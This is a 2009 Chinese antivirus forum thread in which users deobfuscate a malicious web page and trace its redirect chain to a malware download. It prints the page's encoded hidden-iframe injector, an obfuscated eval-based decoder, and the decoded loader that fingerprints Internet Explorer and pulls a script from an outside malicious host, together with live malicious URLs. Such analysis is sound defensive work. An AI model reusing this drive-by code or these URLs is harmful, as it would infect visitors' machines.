瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » omyakicari.com/images/wait.html
kekao - 2009-7-6 19:12:00
请教一下.详细说明一下过程:kaka1: 谢谢!(恶意网址,不要随便打开)

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
gtyre2 - 2009-7-6 20:16:00
不是恶意网站吧
网盾进去没报



引用:
http://omyakicari.com/images/wait.html


页面上有一段ShellCode
取这段


引用:
<script language="javascript">
document.write( unescape( '%3C%64%69%76%20%73%74%79%6C%65%3D%27%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%6C%65%66%74%3A%2D%31%30%30%25%3B%20%77%69%64%74%68%3A%31%30%30%25%3B%20%68%65%69%67%68%74%3A%31%30%30%25%3B%27%3E%3C%69%66%72%61%6D%65%20%73%74%79%6C%65%3D%27%77%69%64%74%68%3A%31%30%30%25%3B%68%65%69%67%68%74%3A%32%30%30%30%27%20%77%69%64%74%68%3D%27%31%30%30%25%27%20%68%65%69%67%68%74%3D%27%32%30%30%30%27%20%73%63%72%6F%6C%6C%69%6E%67%3D%27%6E%6F%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%6E%6F%27%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%27%30%27%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%27%30%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%73%69%6D%70%61%2D%6C%75%78%2E%63%6F%6D%2F%74%73%2F%69%6E%2E%63%67%69%3F%62%61%67%67%69%36%27%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%64%69%76%3E' ) );
</script>

然后弹窗得到



引用:
http://simpa-lux.com/ts/in.cgi?baggi6
xiaoqiang305 - 2009-7-6 20:23:00
freshow直接esc一下就出来了~~但楼主问的肯定不是这个 是往下怎么解
gtyre2 - 2009-7-6 20:41:00
出来这些:kaka6:

Log is generated by FreShow.
[wide]http://omyakicari.com/images/wait.html
    [frame]http://w-netex.com/pore/?7876256053563003de306eb5c094240d
    [frame]http://linotraffic.com/ts/in.cgi?410
kekao - 2009-7-6 22:21:00
能否继续解了.看看是否能下载什么?
gtyre2 - 2009-7-6 22:31:00
无网马:kaka6:
kekao - 2009-7-7 10:23:00
:kaka6: 竟然说没有网马.网马时刻在更新
gtyre2 - 2009-7-7 10:30:00
今天进去网盾报的是这个


引用:
http://brasilianstoree.info/k.php?btn

不过还是解不了:kaka6:
shadowmin - 2009-7-7 12:07:00
关于:hxxp://brasilianstoree.info/k.php?btn解密的日志(全体输出 -  3):

Level  0>http://brasilianstoree.info/k.php?btn
Level  1>http://brasilianstoree.info/k.php?rgljklxskwkkzkekkkffygjezwkejzyjrugkkyiwcwlrwxzz0800
Level  2>http://brasilianstoree.info/k.php?rgljklxskwkkzkekkwffygjezwkejzyjrugkkyiwcwlcjzkkkckkszkkkkkkkkke

日志由 Redoce1.9第68次修正版于 2009-7-7 12:10:21 生成。
只解出这么多,然后就连不上了。
kekao - 2009-7-7 13:18:00
请问题你这个如何得到下两个地址的.详解一下.
shadowmin - 2009-7-7 16:39:00
打开http://brasilianstoree.info/k.php?btn
对代码处理后,如下:
然后在神器中运行。

function YUyPQ3Rh5 (SYstgSMNf,/***/ OC7jn1Pr4) { var qYl064D4m = 0;;{ }/***/ var rAOENu0lF = "";;;{/***/ }/***/ var xkh3444F0 = "/";{ }/***/ var T1yegnHAl = qYl064D4m;;;;{ } try { qYl064D4m = window;;;;{/***/}/***/ }/***/ catch (e ) { } var TbEtbe6hA = arguments;;;{/***/}/***/ try { T1yegnHAl = location;;;{/***/ }/***/ }/***/ catch(e ) {/***/ } var m87gBKDjN = TbEtbe6hA. callee;;;{ }/***/ m87gBKDjN = m87gBKDjN.toString ( );{/***/ } var Xalhb105M = eval;;;;{/***/ } if (T1yegnHAl && rAOENu0lF.length != 2 ) {/***/ m87gBKDjN += T1yegnHAl. href;;;;{/***/ } } var qvRCt5hj6 = 4;;;;{/***/ } var GA1nM8T8v = 0;;;;{/***/} var JQpq7aGLd = new Array;;;{}/***/ var GIApJcIO1 = GA1nM8T8v;{/***/}/***/ while (GIApJcIO1 < m87gBKDjN.length) { var upqgK5O1X = m87gBKDjN. charAt(GIApJcIO1 );;;{} GIApJcIO1++;;;;{/***/ } var dfuO8jR8E = 100;{ } var tAR1mjk4u = parseInt (upqgK5O1X );;{/***/ }/***/ if (dfuO8jR8E != 100) { tAR1mjk4u = 0;{ }/***/ }/***/ if (!isNaN(tAR1mjk4u )) { tAR1mjk4u += 20;;;;{}/***/ if (qvRCt5hj6 == 4 ) {/***/ qvRCt5hj6 = 0;;;;{/***/ } tAR1mjk4u += 20;;;;{/***/ } }/***/ else {/***/ tAR1mjk4u += 20;;{/***/} }/***/ tAR1mjk4u += 8;{ } if (GA1nM8T8v < 4 ) { JQpq7aGLd [qvRCt5hj6 ] = tAR1mjk4u;;{/***/ } } else {/***/ JQpq7aGLd [qvRCt5hj6] += tAR1mjk4u;;;;{ } }/***/ GA1nM8T8v++;;;;{/***/ }/***/ if (JQpq7aGLd [qvRCt5hj6] > 256) {/***/ JQpq7aGLd [qvRCt5hj6] -= 256;;;{ }/***/ } qvRCt5hj6++;;;;{}/***/ }/***/ }/***/ var S3G5oMghl = 0;{/***/ } var aB3Va4CUx = 1;;;;{} aB3Va4CUx--;{/***/ }/***/ while (aB3Va4CUx < OC7jn1Pr4. length ) { var V36RNvP1n = parseInt(OC7jn1Pr4. substring(aB3Va4CUx, aB3Va4CUx + 2 ), 16 );{/***/}/***/ if (S3G5oMghl >= 4) {/***/ S3G5oMghl = 0;{/***/} }/***/ var Qb73uJrL8 = JQpq7aGLd [S3G5oMghl ];;;{ } S3G5oMghl++;;;;{ } aB3Va4CUx++;;;;{/***/}/***/ var Hvs1DTKt1 = V36RNvP1n - Qb73uJrL8;{/***/} if (Hvs1DTKt1 < 1 && Hvs1DTKt1 != 0) {/***/ Hvs1DTKt1 += 129;{/***/} Hvs1DTKt1 += 127;;;{ }/***/ }/***/ aB3Va4CUx++;{ } rAOENu0lF += String. fromCharCode (Hvs1DTKt1 );;;{ } }/***/ var T2JHamyNk = 11;;;;{/***/ } try { Xalhb105M (rAOENu0lF );;;;{/***/ }/***/ }/***/ catch (e ) {/***/ T2JHamyNk = 1;;;;{} }/***/ if (qYl064D4m && T2JHamyNk < 10 ) { qYl064D4m.location = xkh3444F0;;{/***/ }/***/ } }/***/
YUyPQ3Rh5(0, 'ECE7D0A3E1DB1CF6E6D6CBA8C4E5DCB4E6D6CBA8C1271EB1F2B6C186F2CCDCACF2271E83C4B607EE250F15E2261AC1D0F815E2BA0AEEE5A1FC10D7D81B1F08F0E0B9ABF4C4B6AAEF181EC1D118F1D5EB03F3E499F4CC0FDE2ECCE2EB290D1AA1D7D3ECA0E3CCC8D0DED8C1A010D3CD99DE16C8A5D7D31AA0E3CCC8BFDED8C1A01CD3CD99DEFFC8A5D7D304A0E3CCC8D1DED8C1A020D3CD99DE13C8A5D7D316A0E3CCC8E5DED8C1A009D3CD99DE06C899E0E7AE83C02202EBD7F01AC0E8F70BE302E7AE83C02202EBD7F306EF04040BAE30CCDE99DED3DC86C1B9AB821D1B13A1FB25E8AA02160BC4D7E9C1A9F2CCE5F2FEDDECE321F7C1B5D7F105AF161014E02EDA0DDE251315E1F2CCE5F2FEDDECE321F7CCA4E0CC1C86C1B5AAEF181EC1BEFDF6EFC12F021199F4CCE6DDED0B05EC1E23CFDC1F0D13BA2BD4E5F2FEDDECE321F7CAB4C4B6AA82FCF2EBC7FF24F7E9D7E9C1E9181E14DE001A15A1FCF2EBC7FF24F7E9E3CCD2AFE0E7AE83C4B6AA822012C1A1201FEFDA05D4E6BF01FAE9F10D1CCAA2C4B6AA82C01E06ED2C1E0F99FC10D7D81B1F08F0F2B9AB86C1B5AAC01C22EED121E11A99E2E9C1D118F1D5EB03F3E4D4FCF2EBC7FF24F7E914E7AE83C029AE83C4B6AAEB1C2016EB25CCE8DE2DF9F9E3EC25DC86C129AE83C0B9DC99E6D6CBA8C4CC1CF6C1B9D7B4C4E7AE86C4DBCBA3E6DFDCB1F2B5AA86F0E7AA86F2CCDC99C1B9AE82E7E7D0A3E1DBABDD260F16E61C1A15A70F02D8D128E4D1CFD7E9C1AAF2B9ABDD260F16E61C1A15A709F11AE0FF1DFADFD7E9C1AAF2B9ABDD260F16E61C1A15A72FF6F7ED1916F1DAD7E9C1AAF2B9AB86C1B9ABEF181EC1C7311C13CAFA2205B4C4B617DA29CC10AB1EF517C9001DC1B6D71A02EF201302ED261ECFDA271CEEE2251B13CF1C1E14E2261ADC86C12202EBD71BEDB0261DFBCA0ACCDE99E4DDAE832D0D13992715D7E8F91DF6F0D7E9C19BE7DDC3B4C4B6AE832E140AE51CD4C9E803E310EA11FDF499F4CC10AB1EF517C9001DCFE2251006F10612C99BF2FFF19BE3CC10C5EE1B12D308FFCCAAE0D5C19AF4CCCEAAE0CC1C86C1B517DA29CCF5AA1806E2C708EEC1B6D71BD3E00022F1C228DA04E1181EE2EDDF1BEDB0261DFBCA0AD7D4A2F2B9AB86C1B50ADFD7D4F5AA1806E2C708EEC1B6F4CCC3AAD9D5AE83C0B511E2ED1BE3EA0C23C1B6D7CED1ABD9E7AE83C0110DEC1CCC0ADFD7D4F5AA1806E2C708EEC1B6F4CCC3ABD9D5AE83C0B511E2ED1BE3EA0C23C1B6D7CED1ACD9E7AE83C0110DEC1CCC0ADFD7D4F5AA1806E2C708EEC1B6F4CCC3ACD9D5AE83C0B511E2ED1BE3EA0C23C1B6D7CED1ADD9E7AE83C0110DEC1CCC0ADFD7D4F5AA1806E2C708EEC1B6F4CCC3ADD9D5AE83C0B511E2ED1BE3EA0C23C1B6D7CED1AED9E7AE83C0110DEC1CCC0ADFD7D4F5AA1806E2C708EEC1B6F4CCC3AED9D5AE83C0B511E2ED1BE3EA0C23C1B6D7CED1AFD9E7AE83C0110DEC1CCC0ADFD7D4F5AA1806E2C708EEC1B6F4CCC3AFD9D5AE83C0B511E2ED1BE3EA0C23C1B6D7CED1B0D9E7AE83C4B6AAE21DCCC9E920E210BB28011899D8E9C19BE7DDC3A2C4B6AA82191E06DA22E7AE8334B9AB86C1150799DF1C0AAF26EE12CE2ECCDEB6D7CED1AAD9CCC79FD71BD3E00022F1C228DA0AE71B1119C81DD4C3CB1C1806DA2A11C1BC181A05E21B0D15DED9D8C1A9E0CCC2B6D7D9D2A2C4B6AAE920E210BB28011899F4CCC3A9EFCEDC86C1B9AB86C12202EBD72411B103F7EDAB0BCCDE99250D17E21E0D15E829DA14F22A2006E6030D0FE02C0D08DEE51F16DB2A2013A1E7D8C1AAE7D5DC86C12202EBD722E8E1FD0FF2E30ACCDE99D9CEDC86C1B9AB86C11210EBDF2202EBD725D3EA2FDDD2C606E9D1B430DE12F1E8DDEEC8F32411B103F7EDAB0BDA0DDE251315E1F225D3EA2FDDD2C606D7CCA2D727AE83C0F6E6E2312315D319CCDE992F1CD9C502F8D3CDE50F09DA29EF10DD1CED15A130DE12F1E8DDEEC8E0DA15E80A2013E22513C9AAEDD5DC86C1B9AB822012C1A101F10AF32E20FBDBD7E8C1ABE0B9AB82C022E8E1FD0FF2E30ACCCCB6D7CED19BF2B9AB86C1B517C01FF204CA21FFC1A4F4CCEBBE202618ED110EDC86C129AE83C4B618E1201806A12DF309BF1AFD0BCCE51806E71E200999F3CCD3A9E0B9AB822DF309BF1AFD0BCCD7D7DE99D9DCD19BF2B9AB86C1B9ABEF181EC1C7311C13CAFA220599F4CC11E2ED1BE3EA0C23C1A4D722E8E1FD0FF2E30AE7AE83052611EB08EF17DDD7E9C1D0F815E2BA0AEEE5A1052611EB08EF17DDE0E7AE832E150FDD2623CFD0F815E2BA0AEEE599F4CCF8BA20EDE2CCF9F0DC86C12202EBD719EBCBEE02EEC8FDCCDE991B1B04EE24110FEDE50F13DE182006BE23110EDE2520C99B2A0F13E22720C3A2F2B9ABE601FED8CF04FBE7A72A1115BA2B2013E2192115DEDFCE15F22711C3A5D7CE15DE2F20D0E3182202EC1A1E0AE92BCECAB4C4B60EC309E3F7C606F2CFEC1C20E2ED2B1E0ADB2C2006A1D91F13DCD9D8C19B1F2015E9F1DBD0DB290D14E2231502E72A2010EB1C11CFE2251210A822DA11E127EBE7DE3013F3CC0216ECD002F7FBC41CF7ECC4FDF21AE02111FBD00211E7DC2105F9CB1A03ECD20E21F8DC11F7F4DE1106C399E2CCEFF3271EF2BC2D10CAB4C4B605E81A210EDE2520CFDB26101AA7181C11DE2510E4E1201805A124F6F3B00DF9F0BFE0E7AE83C4B6')


得到如下代码。

5;/**/{}/**/
9;;/**/
{}8;

; ;3;{}


function WAiAASBD(Ed6_dsgw)

{

var XaE4rLGC = new Array( 'K', 'W', 'Y', 'j', 'y', 'F', 'e', 'S', 'c', 'X', 'i', 'g', 'u', 'l', 'R', 'Z' );

var DyG1KjjK;

var GevMXj5y = '';



for(DyG1KjjK = 0; DyG1KjjK < Ed6_dsgw.length; DyG1KjjK++) {

var EFJNHxVp = Ed6_dsgw.charAt(DyG1KjjK);

EFJNHxVp = parseInt(EFJNHxVp, 16);



if (isNaN(EFJNHxVp))

return Ed6_dsgw;



GevMXj5y += XaE4rLGC[EFJNHxVp];

}



return GevMXj5y;

}


; /**/
{}

6;
;


/**/3;8;
9;
; ;


0;/**/
document.XV7Xq80V = 1;

document.REygHqYf = 1;

document.xJVtbjPa = 1;





var NzprQCvd;

var o2gIvPIq = navigator.appMinorVersion;

var oL7oqZQS = -1

var pi6oBqUw = "01";



while((oL7oqZQS = o2gIvPIq.indexOf(";SP", oL7oqZQS+1)) != -1) {

var T1aZANQB = o2gIvPIq.charAt(oL7oqZQS+3);



if (T1aZANQB == "1")

pi6oBqUw = "02";

else if (T1aZANQB == "2")

pi6oBqUw = "03";

else if (T1aZANQB == "3")

pi6oBqUw = "04";

else if (T1aZANQB == "4")

pi6oBqUw = "05";

else if (T1aZANQB == "5")

pi6oBqUw = "06";

else if (T1aZANQB == "6")

pi6oBqUw = "07";



if (pi6oBqUw != "01")

break;

}



if (pi6oBqUw == "01" && o2gIvPIq.indexOf("Release Candidate", 0) != -1)

pi6oBqUw = "08";





var xp8LKL2T = navigator.systemLanguage.substr(0, 10);

var vGhFcQjS = "";





for(var y2qx11MO=0;y2qx11MO<XP8LKL2T.LENGTH;Y2QX11MO++) {

JEizwtZb = xp8LKL2T.charCodeAt(y2qx11MO).toString(16);



if (JEizwtZb < 2)

vGhFcQjS += "0";



vGhFcQjS += JEizwtZb;

}



while(vGhFcQjS.length < 20)

vGhFcQjS += "00";





var NzprQCvd = pi6oBqUw + vGhFcQjS;

NzprQCvd = WAiAASBD(NzprQCvd);

window.WAiAASBD = WAiAASBD;

var mJR7VMOF = document.createElement("script");

mJR7VMOF.setAttribute("type", "text/javascript");

mJR7VMOF.setAttribute("src", "http://brasilianstoree.info/k.php?FeygRSKjKWKKZKeKKKFFygjeZWKeFcjYXRcWKYWuWcZKSeZZ" + NzprQCvd);

document.body.appendChild(mJR7VMOF);


shadowmin - 2009-7-7 16:56:00
看上面的代码:

"http://brasilianstoree.info/k.php?FeygRSKjKWKKZKeKKKFFygjeZWKeFcjYXRcWKYWuWcZKSeZZ" + NzprQCvd


要获取NzprQCvd的值,根据上面的代码构造如下代码:

function WAiAASBD(Ed6_dsgw)

{

var XaE4rLGC = new Array( 'K', 'W', 'Y', 'j', 'y', 'F', 'e', 'S', 'c', 'X', 'i', 'g', 'u', 'l', 'R', 'Z' );

var DyG1KjjK;

var GevMXj5y = '';



for(DyG1KjjK = 0; DyG1KjjK < Ed6_dsgw.length; DyG1KjjK++) {

var EFJNHxVp = Ed6_dsgw.charAt(DyG1KjjK);

EFJNHxVp = parseInt(EFJNHxVp, 16);



if (isNaN(EFJNHxVp))

return Ed6_dsgw;



GevMXj5y += XaE4rLGC[EFJNHxVp];

}



return GevMXj5y;

}

var NzprQCvd;

var pi6oBqUw = "01";
var vGhFcQjS = "00";
var NzprQCvd = pi6oBqUw + vGhFcQjS;

NzprQCvd = WAiAASBD(NzprQCvd);
eval(NzprQCvd);


在神器中运行后得到值

KWKK


所以地址为:

http://brasilianstoree.info/k.php?FeygRSKjKWKKZKeKKKFFygjeZWKeFcjYXRcWKYWuWcZKSeZZKWKK


打开这个页面,得到的代码直接在神器中解密,得到地址

http://brasilianstoree.info/k.php?FeygRSKjKWKKZKeKKYFFygjeZWKeFcjYXRcWKYWuWcZuijKKKWKKSZKKKKKKKKKYK


此地址可以下载到文件。正确与否,未知。
shadowmin - 2009-7-7 17:09:00
关于:hxxp://omyakicari.com/images/wait.html解密的日志(全体输出 -  6):

Level  0>http://omyakicari.com/images/wait.html
Level  1>http://trafing.net/in.php
Level  2>http://linotraffic.com/ts/in.cgi?cut4
Level  2>http://brasilianstoree.info/k.php?btn
Level  3>http://brasilianstoree.info/k.php?feygrskjkwkkzkekkkffygjezwkefcjyxrcwkywuwczksezzkwkk
Level  1>http://linotraffic.com/ts/in.cgi?410

日志由 Redoce1.9第68次修正版于 2009-7-7 17:12:58 生成。
1
查看完整版本: omyakicari.com/images/wait.html